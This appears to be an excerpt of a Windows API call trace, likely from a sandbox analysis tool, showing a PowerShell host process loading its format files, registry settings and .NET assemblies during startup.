	[0283.266] GetFileType (hFile=0x304) returned 0x1
	[0283.266] SetErrorMode (uMode=0x1) returned 0x1
	[0283.266] GetFileType (hFile=0x304) returned 0x1
	[0283.266] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.267] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.861] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.862] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.862] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.862] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.863] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0xaca, lpOverlapped=0x0) returned 1
	[0283.863] ReadFile (in: hFile=0x304, lpBuffer=0x33d319a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d319a*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0283.863] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x33d3b68*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0283.863] CloseHandle (hObject=0x304) returned 1
	[0283.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.863] SetErrorMode (uMode=0x1) returned 0x1
	[0283.863] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0283.863] SetErrorMode (uMode=0x1) returned 0x1
	[0283.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.864] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x304) returned 0x0
	[0283.864] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0283.864] CoTaskMemAlloc (cb=0x5a) returned 0x1b903f60
	[0283.864] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x1b903f60, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0283.864] CoTaskMemFree (pv=0x1b903f60) 
	[0283.864] RegCloseKey (hKey=0x304) returned 0x0
	[0283.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0283.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0283.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0283.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0283.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0283.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0283.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0283.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0283.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0283.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0283.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0283.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0283.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0283.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0283.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0283.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.767] VirtualQuery (in: lpAddress=0x12bd80, lpBuffer=0x12cc40, dwLength=0x30 | out: lpBuffer=0x12cc40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.768] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xde6f1553, Data2=0xb49, Data3=0x430f, Data4=([0]=0x97, [1]=0xf7, [2]=0x98, [3]=0xf2, [4]=0x1b, [5]=0x45, [6]=0x68, [7]=0x8d))) returned 0x0
	[0284.768] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x475fe36c, Data2=0xe8a2, Data3=0x4c77, Data4=([0]=0x80, [1]=0x4, [2]=0x66, [3]=0x64, [4]=0x6a, [5]=0x4e, [6]=0xbe, [7]=0x20))) returned 0x0
	[0284.769] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.770] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.771] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xab95c7a1, Data2=0x7fab, Data3=0x47f7, Data4=([0]=0xb2, [1]=0xbf, [2]=0x30, [3]=0xf4, [4]=0x48, [5]=0xb8, [6]=0xd9, [7]=0x13))) returned 0x0
	[0284.774] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x6c1788fe, Data2=0xe50b, Data3=0x46c9, Data4=([0]=0x8f, [1]=0xcc, [2]=0x66, [3]=0x30, [4]=0x45, [5]=0x71, [6]=0x8a, [7]=0x4c))) returned 0x0
	[0284.774] VirtualQuery (in: lpAddress=0x12c180, lpBuffer=0x12d040, dwLength=0x30 | out: lpBuffer=0x12d040*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.775] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.775] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.776] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x2d51a9a3, Data2=0x8b6d, Data3=0x4483, Data4=([0]=0xaa, [1]=0xda, [2]=0xff, [3]=0x35, [4]=0x48, [5]=0x0, [6]=0x5e, [7]=0x74))) returned 0x0
	[0284.776] VirtualQuery (in: lpAddress=0x12c180, lpBuffer=0x12d040, dwLength=0x30 | out: lpBuffer=0x12d040*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.776] VirtualQuery (in: lpAddress=0x12bfa0, lpBuffer=0x12ce60, dwLength=0x30 | out: lpBuffer=0x12ce60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.776] VirtualQuery (in: lpAddress=0x12b7f0, lpBuffer=0x12c6b0, dwLength=0x30 | out: lpBuffer=0x12c6b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.777] VirtualQuery (in: lpAddress=0x12b7f0, lpBuffer=0x12c6b0, dwLength=0x30 | out: lpBuffer=0x12c6b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.777] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xb3643b8a, Data2=0x5e22, Data3=0x4423, Data4=([0]=0xa9, [1]=0x72, [2]=0xe3, [3]=0x89, [4]=0x5d, [5]=0xe3, [6]=0xd3, [7]=0xa3))) returned 0x0
	[0284.777] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd6f37be6, Data2=0xa6ae, Data3=0x40af, Data4=([0]=0x91, [1]=0xe6, [2]=0xc0, [3]=0xc4, [4]=0xca, [5]=0x68, [6]=0xb8, [7]=0xa3))) returned 0x0
	[0284.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0284.777] SetErrorMode (uMode=0x1) returned 0x1
	[0284.778] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0284.778] GetFileType (hFile=0x304) returned 0x1
	[0284.778] SetErrorMode (uMode=0x1) returned 0x1
	[0284.778] GetFileType (hFile=0x304) returned 0x1
	[0284.778] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.222] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.223] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.223] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.224] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.224] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.224] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.224] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.225] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.225] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.225] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.226] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.226] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.226] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.226] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.226] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.228] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.228] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0xbce, lpOverlapped=0x0) returned 1
	[0285.228] ReadFile (in: hFile=0x304, lpBuffer=0x3485896, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3485896*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0285.228] ReadFile (in: hFile=0x304, lpBuffer=0x3486160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3486160*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0285.228] CloseHandle (hObject=0x304) returned 1
	[0285.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0285.229] SetErrorMode (uMode=0x1) returned 0x1
